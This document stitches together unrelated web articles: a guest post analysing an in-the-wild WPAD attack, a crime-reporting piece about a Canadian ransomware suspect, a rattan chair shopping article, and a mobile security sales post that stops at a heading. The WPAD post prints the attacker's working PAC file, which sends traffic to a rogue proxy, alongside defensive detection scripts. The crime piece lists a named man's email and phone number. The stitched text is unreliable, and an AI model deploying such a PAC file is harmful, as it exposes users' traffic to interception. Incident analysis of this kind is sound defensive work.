In-the-Wild WPAD Attack | How Threat Actors Abused Flawed Protocol For Years

A Guest Post By Daniel Persch, QGroup GmbH, Frankfurt am Main

The possibility of leveraging the Web Proxy Auto-Discovery (WPAD) protocol to conduct MITM (Man-in-the-Middle) attacks has been known for many years and has been described previously. However, until now, there was no known case of it occurring in-the-wild. In this post, we disclose details of such an ITW attack discovered by our incident response specialists at QGroup GmbH, Germany, who successfully investigated and mitigated the attack with the help of the SentinelOne platform.

What is WPAD?

Web Proxy Auto Discovery is a protocol used to ensure all devices on a network use the same web proxy configuration. Rather than having to manually configure each device, network administrators may use WPAD to ease the process. When enabled, WPAD searches for a Proxy Auto-Configuration (PAC) file and applies the configuration automatically.

On a typical router, a default DHCP server is configured to enable easy client connectivity. This DHCP server includes a default domain suffix (for example: example.com) which will be assigned to the clients. Clients within the network receive that domain name together with their IP address from the DHCP server when they connect to the network via cable or Wi-Fi.

After retrieving an IP address and domain suffix via DHCP from a router, if WPAD is enabled and no WPAD URL is explicitly specified by the DHCP server, the OS tries the following URLs to retrieve appropriate proxy settings for the connection:

http://wpad.department.branch.example.com/wpad.dat 
http://wpad.branch.example.com/wpad.dat
http://wpad.example.com/wpad.dat
http://wpad/wpad.dat

The example.com portion of these URLs is replaced by the domain suffix assigned by the DHCP server. If that suffix is a publicly reachable fully-qualified domain name (FQDN), the URL will be requested from the internet accordingly. If an attacker owns the domain that the internal router hands out and the client has WPAD enabled, the attacker can route the traffic of every internet application that honours the system proxy settings through the attacker’s proxy.

All the attacker needs to do is to provide a correct PAC file at one of the locations mentioned above, and the client OS will use the configuration on-the-fly without any user interaction.
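As an added example (not code from the original post), the following JavaScript reproduces the candidate list above for an arbitrary DHCP suffix and flags which of those names a client would resolve from the public namespace rather than from DNS the organization controls. The controlled-zone list and the handling of a single-label suffix are assumptions.

```javascript
// Build the WPAD hostnames a client derives from its DHCP domain suffix,
// in the order the post lists them: strip one leading label at a time while
// at least two labels remain, then fall back to the bare name "wpad".
function wpadCandidates(domainSuffix) {
  const labels = domainSuffix
    .toLowerCase()
    .replace(/\.+$/, '')
    .split('.')
    .filter(Boolean);
  const candidates = [];
  if (labels.length > 0) {
    // Assumption: a single-label suffix such as "lan" is tried as wpad.lan.
    const lastStart = labels.length >= 2 ? labels.length - 2 : 0;
    for (let i = 0; i <= lastStart; i++) {
      candidates.push('wpad.' + labels.slice(i).join('.'));
    }
  }
  candidates.push('wpad');
  return candidates;
}

// True when host is the zone itself or a subdomain of it.
function hostUnderZone(host, zone) {
  return host === zone || host.endsWith('.' + zone);
}

// Classify each candidate. Only names under a DNS zone the organization
// controls are answered by internal DNS; every other FQDN is looked up in
// global DNS, where whoever registered that domain can serve wpad.dat.
// The bare name "wpad" depends on the client's DNS search list instead.
function assessWpadExposure(domainSuffix, controlledZones) {
  const zones = controlledZones.map(z => z.toLowerCase().replace(/\.+$/, ''));
  return wpadCandidates(domainSuffix).map(host => {
    let risk;
    if (!host.includes('.')) {
      risk = 'search-list-dependent';
    } else if (zones.some(z => hostUnderZone(host, z))) {
      risk = 'internal';
    } else {
      risk = 'public-namespace';
    }
    return { host, risk };
  });
}

// Constructed inputs: a home router handing out the "domain.name" suffix
// from the post, and an enterprise suffix under an assumed controlled zone.
const HOME_ROUTER_SUFFIX = 'domain.name';
const ENTERPRISE_SUFFIX = 'department.branch.example.com';
const CONTROLLED_ZONES = ['branch.example.com'];

function report(suffix, zones) {
  return assessWpadExposure(suffix, zones)
    .map(r => `${r.host.padEnd(40)} ${r.risk}`)
    .join('\n');
}

console.log(report(HOME_ROUTER_SUFFIX, CONTROLLED_ZONES));
console.log(report(ENTERPRISE_SUFFIX, CONTROLLED_ZONES));
```

Note that devolution walks above the controlled zone: with branch.example.com under internal control, the client still queries wpad.example.com in global DNS.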

WPAD Attack Details

We discovered a case where this weakness appears to have been abused for at least three years and is redirecting the internet traffic of users around the world through the attacker’s proxy.

Although more domains could be affected, the following analysis is tied to this domain name:

domain.name

The attacker registered the publicly reachable FQDN and set up a server at wpad.domain.name, hosting a web server on the default TCP-Port 80.

The name was likely chosen in light of the fact that on some home routers, the default DNS domain setting is “domain.name”. The expansion of Top Level Domain names in recent years has made it possible to register domains with the .name TLD, so what may have once been a safe default choice has become subject to a WPAD Name Collision Vulnerability.

In the attack we discovered, the source IP of the victim seems to determine whether the server answers with an empty response or with a WPAD Proxy Auto-Configuration file. An empty response was received when we tried the following command from a German Telekom address.

$ curl http://wpad.domain.name/wpad.dat

However, when performed using a VPN provider with outgoing IP originating in Malaysia, we received the following PAC file:

$ curl http://wpad.domain.name/wpad.dat 
function FindProxyForURL(url, host) {

	if (isPlainHostName(host) || 
		dnsDomainIs(host, ".windowsupdate.com") || 
		dnsDomainIs(host, ".microsoft.com") || 
		dnsDomainIs(host, ".baidu.com") ||
		dnsDomainIs(host, ".kaspersky.com") || 
		dnsDomainIs(host, ".axaltacs.net") || 
		dnsDomainIs(host, ".live.com") || 
		dnsDomainIs(host, ".drivergenius.com") ||
			isInNet(host, "10.0.0.0", "255.0.0.0") || 
			isInNet(host, "172.16.0.0", "255.255.224.0") || 
			isInNet(host, "192.168.0.0", "255.255.0.0") || 
			isInNet(host, "127.0.0.0", "255.0.0.0"))
		return "DIRECT"; 
	else
		return 'PROXY 185.38.111.1:8080';
}

What we can see here is that the PAC file instructs the client to use the proxy server at the following address:

185.38.111.1:8080

for all addresses except RFC1918, localhost and the following domains:

baidu.com
kaspersky.com
live.com
microsoft.com
windowsupdate.com
axaltacs.net
drivergenius.com

In other versions of this PAC file (see IoCs below), we have also seen the following lines added to the exclusions:

dnsDomainIs(host, ".googlevideo.com")
dnsDomainIs(host, ".youtube.com")

and

dnsDomainIs(host, ".dhl.com")

At the time of our investigation, the embedded IP address was serving an HTTP proxy on TCP port 8080.
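The PAC helper calls decide, per host, whether traffic goes DIRECT or to the proxy. The following JavaScript is an added example (not part of the original post): it implements the three PAC helpers offline, loads the wpad.dat shown above as captured, and lists every proxy endpoint the file routes to. The probe hosts are constructed.

```javascript
// Offline implementations of the PAC helper functions the captured file uses.
function isPlainHostName(host) {
  return !host.includes('.');
}

function dnsDomainIs(host, domain) {
  // Suffix match, so "www.microsoft.com" matches ".microsoft.com".
  return host.endsWith(domain);
}

function ipToInt(ip) {
  const parts = ip.split('.').map(Number);
  if (parts.length !== 4 || parts.some(p => !Number.isInteger(p) || p < 0 || p > 255)) {
    return null;
  }
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

function isInNet(host, pattern, mask) {
  // A browser resolves hostnames here; this triage version only accepts IP
  // literals so that evaluating a captured file never triggers DNS lookups.
  const h = ipToInt(host), p = ipToInt(pattern), m = ipToInt(mask);
  if (h === null || p === null || m === null) return false;
  return ((h & m) >>> 0) === ((p & m) >>> 0);
}

// Compile the PAC source with our helpers bound. new Function() is not an
// isolation boundary: evaluate captured files only on an analysis host.
function loadPac(pacSource) {
  const factory = new Function(
    'isPlainHostName', 'dnsDomainIs', 'isInNet',
    pacSource + '\nreturn FindProxyForURL;'
  );
  return factory(isPlainHostName, dnsDomainIs, isInNet);
}

// Run every host through the PAC and collect each proxy endpoint it names.
function triagePac(pacSource, hosts) {
  const findProxy = loadPac(pacSource);
  const decisions = {};
  const proxies = new Set();
  for (const host of hosts) {
    const verdict = findProxy('http://' + host + '/', host);
    decisions[host] = verdict;
    for (const entry of verdict.split(';')) {
      const [kind, endpoint] = entry.trim().split(/\s+/);
      if (kind === 'PROXY' || kind === 'SOCKS') proxies.add(endpoint);
    }
  }
  return { decisions, proxies: [...proxies].sort() };
}

// The wpad.dat served to the Malaysian vantage point, as quoted in the post.
const CAPTURED_PAC = `
function FindProxyForURL(url, host) {
  if (isPlainHostName(host) ||
      dnsDomainIs(host, ".windowsupdate.com") ||
      dnsDomainIs(host, ".microsoft.com") ||
      dnsDomainIs(host, ".baidu.com") ||
      dnsDomainIs(host, ".kaspersky.com") ||
      dnsDomainIs(host, ".axaltacs.net") ||
      dnsDomainIs(host, ".live.com") ||
      dnsDomainIs(host, ".drivergenius.com") ||
      isInNet(host, "10.0.0.0", "255.0.0.0") ||
      isInNet(host, "172.16.0.0", "255.255.224.0") ||
      isInNet(host, "192.168.0.0", "255.255.0.0") ||
      isInNet(host, "127.0.0.0", "255.0.0.0"))
    return "DIRECT";
  else
    return 'PROXY 185.38.111.1:8080';
}
`;

// Constructed probe hosts: one per exclusion class, plus 172.20.1.1, which is
// RFC 1918 space but outside the 255.255.224.0 (/19) mask the file applies to
// 172.16.0.0, so the PAC sends it to the proxy anyway.
const PROBE_HOSTS = [
  'intranet', 'update.microsoft.com', 'www.baidu.com', 'mail.example.org',
  '10.1.2.3', '172.16.5.5', '172.20.1.1', '192.168.1.1', '127.0.0.1',
];

function triageCapturedPac() {
  return triagePac(CAPTURED_PAC, PROBE_HOSTS);
}

const result = triageCapturedPac();
console.log(result.decisions);
console.log('proxy endpoints named by this PAC:', result.proxies);
```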

When using the PAC file with Firefox, we could successfully establish a connection through the specified proxy.

According to VirusTotal, the IP address 185.38.111.1:8080 is referenced by various known malware files.

The wpad.dat PAC files containing this specific proxy IP address also have a history of being served by a number of other known malicious sites, including:

  • stoppblock[.]net/wpad.dat
  • stoppblock[.]org/wpad.dat
  • stoppblock[.]com/wpad.dat
  • access-unstop[.]info/wpad.dat
  • accessquick[.]net/wpad.dat

SHA1: acf3275189948f095f122289d2d6ef44be6ccc4d

Many of these sites are tagged as “known infection source”, “proxy avoidance” and “malware repository, spyware and malware”.

Impact and Recommendations

While this MITM attack via rogue-proxy appears to have been in use for several years, the fact that most web traffic these days is secured with TLS means attackers need to generate certificates that the web browser would trust before they could inspect or redirect interesting traffic.

Some web sites respond on the first visit with an HSTS (HTTP Strict Transport Security) header that tells the browser all future requests must be made over TLS, which prevents SSL stripping attacks, a means of forcing an encrypted HTTPS connection to downgrade to insecure HTTP. According to recent data, however, only about 22% of sites currently use HSTS. Traffic that is neither TLS- nor HSTS-protected is vulnerable to MITM attacks, and downloads over plain HTTP are particularly exposed to interception by such a rogue proxy.

For enterprises, the domain suffix returned by DHCP while at the office is likely to be a domain whose DNS is controlled by the company, so it would be difficult for an attacker to add a rogue WPAD DNS entry. More commonly, home or public routers using the default “wpad.domain.name” or any other generic TLD (gTLD) name that is subject to a domain name collision could be vulnerable to such a MITM attack.

It is worth noting that in Windows 10, WPAD is enabled by default. In macOS and Linux, this setting is available but disabled by default.

Best practices for protecting against the wider WPAD Name Collision Vulnerability are outlined in this US-CERT advisory and include:

  • Consider disabling automatic proxy discovery/configuration in browsers and operating systems unless those systems will only be used on internal networks.
  • Consider using a registered and fully qualified domain name (FQDN) from global DNS as the root for enterprise and other internal namespace.
  • Consider using an internal TLD that is under your control and restricted from registration with the gTLD program.
  • Configure internal DNS servers to respond authoritatively to internal TLD queries.
  • Configure firewalls and proxies to log and block outbound requests for wpad.dat files.
  • Identify expected WPAD network traffic and monitor the public namespace or consider registering domains defensively to avoid future name collisions.
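To act on the logging recommendations above, here is an added example (not from the advisory or the post) that scans proxy access-log lines for wpad.dat fetches and raises an alert for each one whose host is not under a DNS zone the organization controls. The log format, the controlled-zone list and the sample lines are constructed.

```javascript
// Zones whose DNS the organization controls; a WPAD fetch to any other
// domain went to the public namespace. Assumed value for this example.
const CONTROLLED_ZONES = ['corp.example.com'];

function hostUnderZone(host, zone) {
  return host === zone || host.endsWith('.' + zone);
}

// Parse one Squid-style access.log line (constructed format for this
// example): timestamp elapsed client status bytes method url user peer type.
// CONNECT lines carry host:port rather than a URL and are skipped.
function parseAccessLine(line) {
  const f = line.trim().split(/\s+/);
  if (f.length < 7) return null;
  let url;
  try {
    url = new URL(f[6]);
  } catch {
    return null;
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return null;
  return { client: f[2], method: f[5], host: url.hostname.toLowerCase(), path: url.pathname };
}

// Return an alert for every wpad.dat request whose host lies outside the
// controlled zones, so the SOC can see which clients performed WPAD
// discovery against a publicly registered name.
function findRogueWpadFetches(lines, zones) {
  const alerts = [];
  for (const line of lines) {
    const rec = parseAccessLine(line);
    if (!rec || !rec.path.toLowerCase().endsWith('/wpad.dat')) continue;
    const internal = zones.some(z => hostUnderZone(rec.host, z));
    if (!internal) {
      alerts.push({ client: rec.client, host: rec.host, line });
    }
  }
  return alerts;
}

// Constructed sample lines. 198.51.100.0/24 and 192.0.2.0/24 are documentation
// ranges; wpad.domain.name is the hostname discussed in the post.
const SAMPLE_LOG = [
  '1700000001.001 12 10.1.2.3 TCP_MISS/200 523 GET http://wpad.corp.example.com/wpad.dat - HIER_DIRECT/10.0.0.5 application/x-ns-proxy-autoconfig',
  '1700000002.002 88 10.1.2.7 TCP_MISS/200 611 GET http://wpad.domain.name/wpad.dat - HIER_DIRECT/198.51.100.7 application/x-ns-proxy-autoconfig',
  '1700000003.003 5 10.1.2.9 TCP_MISS/200 1020 GET http://www.example.org/index.html - HIER_DIRECT/192.0.2.20 text/html',
  '1700000004.004 9 10.1.2.7 TCP_MISS/200 611 GET http://WPAD.Domain.Name/WPAD.DAT - HIER_DIRECT/198.51.100.7 application/x-ns-proxy-autoconfig',
  '1700000005.005 30 10.1.2.4 TCP_TUNNEL/200 4100 CONNECT www.example.org:443 - HIER_DIRECT/192.0.2.20 -',
];

function scanSampleLog() {
  return findRogueWpadFetches(SAMPLE_LOG, CONTROLLED_ZONES);
}

for (const a of scanSampleLog()) {
  console.log(`ALERT client=${a.client} fetched wpad.dat from public name ${a.host}`);
}
```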

In our investigation, we were able to search for the malicious IP across all our SentinelOne instances to find a number of affected parties. Our strategic integration of SentinelOne into our security operations processes (SecOps, IR, Analytics) enabled a rapid reaction and allowed us both to protect all of our customers immediately and to identify, on an ad hoc basis, which customers had been affected.

Conclusion

The flaws inherent in WPAD have received plenty of attention from security researchers, leading one to suggest renaming it “badWPAD” because the risks it presents stem directly from its design, rather than any faulty configuration or implementation on the network administrator’s side.

Now we know that threat actors have been paying attention, too. Combining malicious PAC files with selective domain name registrations, they have been able to compromise the traffic of internet users for years. Despite various network safeguards such as TLS and HSTS, and software download safeguards such as digital signature verification, there is still plenty of scope for malicious actors to attack unwary organizations and end users via WPAD and unencrypted traffic.

In particular, because home routers with default settings are the most affected, the trend towards remote work and Work From Home caused by the COVID-19 pandemic poses a particular risk given the rise of endpoints outside the protection of the office LAN.

With the evidence presented here of in-the-wild WPAD attacks, those risks must be mitigated by administrators by attending to the recommendations above and ensuring that they have full visibility into network traffic via a modern EDR or XDR platform.

Indicators of Compromise


Canada Charges Its “Most Prolific Cybercriminal”

A 31-year-old Canadian man has been arrested and charged with fraud in connection with numerous ransomware attacks against businesses, government agencies and private citizens throughout Canada and the United States. Canadian authorities describe him as “the most prolific cybercriminal we’ve identified in Canada,” but so far they’ve released few other details about the investigation or the defendant. Helpfully, an email address and nickname apparently connected to the accused offer some additional clues.

Matthew Philbert, in 2016.

Matthew Philbert of Ottawa, Ontario was charged with fraud and conspiracy in a joint law enforcement action by Canadian and U.S. authorities dubbed “Project CODA.” The Ontario Provincial Police (OPP) on Tuesday said the investigation began in January 2020 when the U.S. Federal Bureau of Investigation (FBI) contacted them regarding ransomware attacks that were based in Canada.

“During the course of this investigation, OPP investigators determined an individual was responsible for numerous ransomware attacks affecting businesses, government agencies and private individuals throughout Canada as well as cyber-related offenses in the United States,” reads an OPP statement.

“A quantity of evidentiary materials was seized and held for investigation, including desktop and laptop computers, a tablet, several hard drives, cellphones, a Bitcoin seed phrase and a quantity of blank cards with magnetic stripes,” the statement continues.

The U.S. indictment of Philbert (PDF) is unusually sparse, but it does charge him with conspiracy, suggesting the defendant was part of a group. In an interview with KrebsOnSecurity, OPP Detective Inspector Matt Watson declined to say whether other defendants were being sought in connection with the investigation, but said the inquiry is ongoing.

“I will say this, Philbert is the most prolific cybercriminal we’ve identified to date in Canada,” Watson said. “We’ve identified in excess of a thousand of his victims. And a lot of these were small businesses that were just holding on by their fingernails during COVID.”

A DARK CLOUD

There is a now-dormant Myspace account for a Matthew Philbert from Orleans, a suburb of Ottawa, Ontario. The information tied to the Myspace account matches the age and town of the defendant. The Myspace account was registered under the nickname “Darkcloudowner,” and to the email address dark_cl0ud6@hotmail.com.

A search in DomainTools on that email address reveals multiple domains registered to a Matthew Philbert and to the Ottawa phone number 6138999251 [DomainTools is a frequent advertiser on this site]. That same phone number is tied to a Facebook account for a 31-year-old Matthew Philbert from Orleans, who describes himself as a self-employed “broke bitcoin baron.”

Mr. Philbert did not respond to multiple requests for comment.

According to cyber intelligence firm Intel 471, that dark_cl0ud6@hotmail.com address has been used in conjunction with the handle “DCReavers2” to register user accounts on a half-dozen English-language cybercrime forums since 2008, including Hackforums, Blackhatworld, and Ghostmarket.

Perhaps the earliest and most important cybercrime forum DCReavers2 frequented was Darkode, where he was among the first two-dozen members. Darkode was taken down in 2015 as part of an FBI investigation sting operation, but screenshots of the community saved by this author show that DCReavers2 was already well known to the Darkode founders when his membership to the forum was accepted in May 2009.

DCReavers2 was just the 22nd account to register on the Darkode cybercrime forum.

Most of DCReavers2’s posts on Darkode appear to have been removed by forum administrators early on (likely at DCReavers2’s request), but the handful of posts that survived the purge show that more than a decade ago DCReavers2 was involved in running botnets, or large collections of hacked computers.

“My exploit pack is hosted there with 0 problems,” DCReavers2 says of a shady online provider that another member asked about in May 2010.

Searching the Web on “DCreavers2” brings up a fascinating chat conversation allegedly between DCReavers2 and an individual in Australia who was selling access to an “exploit kit,” commercial crimeware designed to be stitched into hacked or malicious sites and exploit a variety of Web-browser vulnerabilities for the purposes of installing malware of the customer’s choosing.

In that 2009 chat, indexed by the researchers behind the website exposedbotnets.com, DCReavers2 uses the Dark_Cl0ud6 email address and actually shares his real name as Matthew Philbert. DCReavers2 also says his partner uses the nickname “The Rogue,” which corresponds to a former Darkode administrator who was the second user ever registered on the forum (see screenshot above).

In that same conversation, DCReavers2 discusses managing a botnet built on ButterFly Bot. Also known as “Mariposa,” ButterFly was a plug-and-play malware strain that allowed even the most novice of would-be cybercriminals to set up a global operation capable of harvesting data from thousands of infected PCs, and using the enslaved systems for crippling attacks on Web sites. The ButterFly Bot kit sold for prices ranging from $500 to $2,000.

An advertisement for the ButterFly Bot.

The author of ButterFly Bot — Slovenian hacker Matjaz “Iserdo” Skorjanc — was Darkode’s original founder back in 2008. Arrested in 2010, Skorjanc was sentenced to nearly five years in prison for selling and supporting Mariposa, which was used to compromise millions of Microsoft Windows computers.

Upon release from prison, Skorjanc became chief technology officer for NiceHash, a cryptocurrency mining service. In December 2017, $52 million worth of Bitcoin mysteriously disappeared from NiceHash coffers. In October 2019, Skorjanc was arrested in Germany in response to a U.S.-issued international arrest warrant for his extradition.

The indictment (PDF) tied to Skorjanc’s 2019 arrest also names several other alleged founding members of Darkode, including Thomas “Fubar” McCormick, a Massachusetts man who was allegedly one of the last administrators of Darkode. Prosecutors say McCormick also was a reseller of the Mariposa botnet, the ZeuS banking trojan, and a bot malware he allegedly helped create called “Ngrbot.” The U.S. federal prosecution against Skorjanc and McCormick is ongoing.

At the time the FBI dismantled Darkode in 2015, the Justice Department said that out of 800 or so crime forums worldwide, Darkode was the most sophisticated English-language forum, and that it represented “one of the gravest threats to the integrity of data on computers in the United States and around the world.”

Some of Darkode’s core members were either customers or sellers of various “locker” kits, which were basically web-based exploits that would lock the victim’s screen into a webpage spoofing the FBI or Justice Department and warning that victims had been caught accessing child sexual abuse material. Victims who agreed to pay a “fine” of several hundred dollars worth of GreenDot prepaid cards could then be rid of the PC locker program.

A 2012 sales thread on Darkode for Rev Locker.

In many ways, lockers were the precursors to the modern cybercrime scourge we now know as ransomware. The main reason lockers never took off as an existential threat to organizations worldwide was that there is only so much money locker users could reasonably demand via GreenDot cards.

But with the ascendance and broader acceptance of virtual currencies like Bitcoin, suddenly criminal hackers could start demanding millions of dollars from victims. And it stands to reason that a great many Darkode members who were never caught have since transitioned from lockers, exploit kits and GreenDot cards to doing what every other self-respecting cybercrook seems to be involved with these days: Locking entire companies and industries for ransomware payments.

One final observation about the Philbert indictment: It’s good to see the Canadian authorities working closely with the FBI on important cybercrime cases. Indeed, this investigation is remarkable for that fact alone. For years I’ve been wondering aloud why more American cybercriminals don’t just move to Canada, because historically there has been almost no probability that they will ever get caught — let alone prosecuted there. With any luck, this case will be the start of something new.

Kids’ rattan chair – stylish and sustainable addition to your interior

Do you fancy beachy, bohemian style? Are you invested in being eco-friendly? If you answered yes, then it’s time to redo your kid’s room and make it look like a little gem. Also, you can make your kid feel even more comfortable in their own room. Even if it’s the baby’s first bedroom, it has to look stylish and cozy at the same time.

So how do you achieve the mission?

First of all, you have to find the perfect kids’ rattan chair for your kid. This piece will instantly bring looks and feelings of the summer season into the room!

Do not be afraid to use bright colors in decorating it. You can paint walls with light blue or pastel green. Then, you just need to add some cute accessories, and you’re done!

Adding a hammock chair to the corner will make the room cozier, and your child can enjoy spending time reading or just taking a nap in it. If there is not enough space for a hammock chair, go for a regular rattan chair.

Rattan furniture is perfect for any kid’s room because it is not only stylish but also eco-friendly. Plus, it is very affordable and easy to clean, which is a bonus!

What is rattan?

Rattan is a natural fiber made from a type of palm tree. It is known for its strength and resistance to wear and tear. Because rattan is a natural fiber, it has been used in Malaysia for over 100 years as traditional furniture.

Rattan is resistant to weather and insects, making it durable for outdoor use. The fibers are woven together to create furniture that is sturdy but also flexible. Rattan can be used without adding harmful chemicals into the environment, making it safe to use in the home.

Rattan chairs are perfect for families that love nature and want their homes to be eco-friendly. It is a versatile material, so if you purchase a rattan chair for your kid, you can also use it for yourself. Why not enjoy some time reading with your child in their new chair?

Where is rattan found?

Rattan can be found in many different countries but is native to Southeast Asia. The rattan palm tree thrives in areas with high humidity and temperatures that don’t fall below 10°C (50°F). As a result, it grows primarily in Indonesia and Malaysia. Other parts of the world, such as Africa, also have rattan trees, but the furniture’s quality is not as good.

How is rattan made?

Rattan is made from the fibers in the rattan palm. The palm tree has large leaves which grow in bunches of six to twelve leaflets, making them look like a feather when they unfurl. The trees can grow 20 meters (65 feet) or more and live for about 25 years.

To make furniture, the bark is removed from the tree and dried in bundles to make rattan strips. These strips can vary in width and length depending on the type of tree and furniture manufacturer. The fibers are soaked in water for 24 to 48 hours before being woven together to create different kinds of furniture, such as chairs, beds, loungers, couches, and tables. One example is rattan chairs, which are often used by kids and adults alike because of their durability and eco-friendly properties.

What is the difference between wicker and rattan?

Wicker is made from the stems of a different type of palm tree, while rattan is made from the fibers in the rattan palm. Rattan is also stronger and more durable than wicker, making it a better choice for furniture. Wicker is often used to make baskets, while rattan can be used to make furniture, flooring, wall paneling, and signs.

Is rattan furniture eco-friendly?

Yes, rattan furniture is eco-friendly. It is made from all-natural materials and does not contain any harmful chemicals. It does not require much energy to produce, allowing manufacturers to create a long-lasting product without harming the environment. The use of rattan furniture can reduce your carbon footprint by saving trees and reducing waste products.

Kids’ rattan chairs – our best picks

Furniture is an essential part of any home, and kids’ furniture is no exception. When it comes to finding the perfect chair for your child, you want something durable, eco-friendly, and stylish. Rattan chairs meet all of these requirements and make a great addition to any kid’s room.

The company called Beachy Mums caught our attention. It has a range of different rattan chairs for kids designed to be both stylish and comfortable. The chairs are made from all-natural materials, making them the perfect choice for kids prone to allergies or asthma.

Here are our top picks for rattan chairs for kids:

Beachy Mums Children’s Handmade Rattan Peacock Chair

This one is a beauty! The rattan material used to make this chair is sourced from Indonesia and crafted by hand. It’s lightweight and easy to move around, making it perfect for any room. It comes with a soft cushion for extra comfort. It is an excellent and stylish choice for kids aged 2-5.

Beachy Mums Rattan Toddler Rainbow Chair

If you’re looking for a rattan chair with a simpler design, this one is a great option. All-natural, sustainable materials are used to produce each one. These beautiful kids’ chairs are handcrafted in Java, Indonesia, and are of excellent quality.

The rainbow pattern makes it a great addition to any children’s space. This chair is ideal for children aged 2 years and older.

Beachy Mums Handmade Vintage Peace Sign Rattan Kid’s Chair

This vintage-style chair is perfect for younger kids. It features a cute peace sign design and is handmade from all-natural materials. The material used is eco-friendly and sustainable, so you know you’re doing the right thing by purchasing it. It is lightweight and easy to move around, making it perfect for any room. This chair is ideal for kids aged 2-5 years old.

Bloomingville Rattan Arm Chair

Time for a chair for both parent and child! This rattan armchair by Danish design company Bloomingville is perfect. It has a simple and stylish design that will complement any home décor. The all-natural rattan material makes it eco-friendly and sustainable. This rattan chair provides a basic yet beautiful bohemian design and a lighthearted atmosphere to the area. It is an excellent piece of Scandinavian design!

Where can I use my rattan furniture?

Rattan furniture is designed to be used on patios and backyards, but it also works inside the home. Rattan chairs add a touch of class to any room, especially if the chairs are used as part of a larger rattan furniture set. Rattan sofas and couches can be used in living rooms, dens, and bedrooms. The material’s natural properties make it easy to blend with any color scheme or theme. Rattan also matches well with wood or other types of furniture.

When should I replace my rattan furniture?

Rattan chairs are designed to last for years, but they can be damaged if left outside through harsh conditions such as rain and snow. To prevent your chair from getting damaged, cover it with a tarp or leave it inside when you’re not using it. If your chair does get damaged, you can usually repair it by using a rattan furniture repair kit.

How do I clean my rattan furniture?

Rattan furniture is easy to clean and does not require any special care. You can simply use a damp cloth to wipe away dirt and dust. If there is a spill, use a dry cloth to blot the liquid and then wipe with a wet cloth. Do not use any type of soap or cleaning agent, as this may damage the furniture. For more thorough cleaning, you can use a vacuum cleaner or soft-bristled brush to remove any dirt or dust that may be trapped in the fibers.

Are there any health risks associated with rattan furniture?

There are no known health risks associated with rattan furniture. The material is made from natural fibers and does not contain harmful chemicals or toxins. Rattan is also resistant to mold and mildew, making it a safe choice for people with allergies or asthma.

Conclusion

Rattan furniture is an excellent choice for any home. It has a simple and stylish design that will complement any décor. The all-natural rattan material is eco-friendly and sustainable, making it a responsible choice for your home. Rattan furniture is both durable and easy to maintain. Rattan chairs are designed for comfort, but the material also gives the room a lighthearted atmosphere.

The post Kids’ rattan chair – stylish and sustainable addition to your interior appeared first on Comfy Bummy.

Mobile Threat Defense | Bringing AI-Powered Endpoint Security To Your Mobile Devices

A Guest Post by Shridhar Mittal, CEO of Zimperium

For the past few decades, corporations have spent considerable time and resources investing in security solutions for traditional endpoints and the infrastructure to which these devices connect. The focus has been on the devices their employees and customers use to connect to their services or workflows.

Modern workflows have evolved and grown, and as a result, new devices have been introduced into the enterprise environment. Many organizations big and small accepted these tablets and phones into their systems in the spirit of productivity, but have dedicated little thought as to how these devices might impact their attack surface.

The Rise of Mobile in the Enterprise

Over the last two years, the modern workforce has changed the face of enterprise security needs, pushing the envelope of technology, access, and capabilities for workers connecting into corporate systems all around the world. Far outside the scope of the physical corporate perimeters and the security within, these new workflows have done more than increase distributed efficiency; they have increased the modern enterprise attack surface to a scale many enterprises were not prepared to handle.

In the context of these last two years and the rapid transformation to work that they represented, mobile devices became utterly critical assets. From replacing the encrypted token keys of the past with two-factor authentication (2FA) apps, to enabling Microsoft Office 365 and other workforce productivity applications for mobile access, the phones and tablets adorning the desks of employees around the world were now part of the core enterprise technology ecosystem in a way they just had not been previously.

These devices are not all corporate-owned either. According to the Verizon Mobile Security Index 2021, 70% of organizations adopted BYOD policies to support the distributed worker. It must be stated explicitly: this means that enterprise data is being accessed, downloaded, and transferred to all of these devices, many of which are personally owned.

And this is not a flash in the pan. The reliance on the mobile endpoint is here to stay. According to the Verizon Mobile Security Index 2021, 71% of enterprises consider mobile to be very critical to business, a trend that rapidly accelerated due to the global pandemic. But with this heavy reliance comes a major shift in the total attack surface for each of these enterprises, and yet far too many still lack even the basic security afforded to more traditional endpoints.

Unprotected Mobiles Increase Your Attack Surface

With this sharp uptick in mobile reliance and usage, attackers have turned their focus to unsecured mobile devices, ripe with corporate system connections, personal and private data, and a low risk of being caught. Many recent headlines demonstrate these attacks are not just small data leaks. Instead, enterprises are faced with zero-day and zero-click vulnerabilities designed to target mobile devices to steal or spy on unsuspecting users. With the average user unaware of the risks to their devices, many of these attacks are more successful than even malicious actors anticipated.

According to Google’s Project Zero, so far in 2021 Android and iOS have accounted for 31% of all zero-day, in-the-wild vulnerabilities used in real attacks against real users (18 out of 58). This is a sharp uptick over 2020, when mobile alone accounted for 11% (3 out of 26).

Maddie Stone and Clement Lecigne of Google’s Threat Analysis Group attribute this sharp rise in attacks and the changing attack surface to the earlier mentioned reliance and aforementioned growth of mobile throughout the world.

“The growth of mobile platforms has resulted in an increase in the number of products that actors want capabilities for.” – Maddie Stone & Clement Lecigne, Google Threat Analysis Group, 2021

When you start thinking about enterprise data and security, the bottom line is that mobile endpoints pose a great risk. Between BYOD policies, Office 365 and compliance mandates like HIPAA, PCI or NERC, enterprises need to mandate security on all endpoints, mobile included, just as they do for traditional endpoints. It makes no difference whether an employee’s data sits on a laptop or a tablet; it is one and the same.

From the rise of man-in-the-middle attacks targeting endpoints to misconfigured apps leaking critical information, it’s not just malware that is threatening mobile security. These relied-upon mobile endpoints and the data they are connected to through enterprise apps and services are left at risk due to vulnerable operating systems, malicious and poorly secured apps, and phishing. Rogue and compromised networks, an increasing number of apps with cross-functionality, and even mobile-malware complexity mirroring traditional threats continue to introduce risks to mobile endpoints and apps.

MDM Is No Substitute For Mobile Threat Defense

Over the last few years, many enterprises have turned to mobile device management (MDM) solutions to provide minimal air cover for their iOS and Android devices. When the threat was minimal, these solutions made sense, as they could detect changes in the OS or delete corporate data in the event of a lost or stolen device.

But MDMs are not fit to fulfill the security needs of the modern enterprise, lacking the security controls, protections, and capabilities necessary to stand up against advanced threats. MDM solutions are the start of a cohesive mobile security strategy, but MDM cannot be relied upon as the only layer protecting enterprises from the growing mobile threat.

Protect Your Mobile Endpoints with MTD

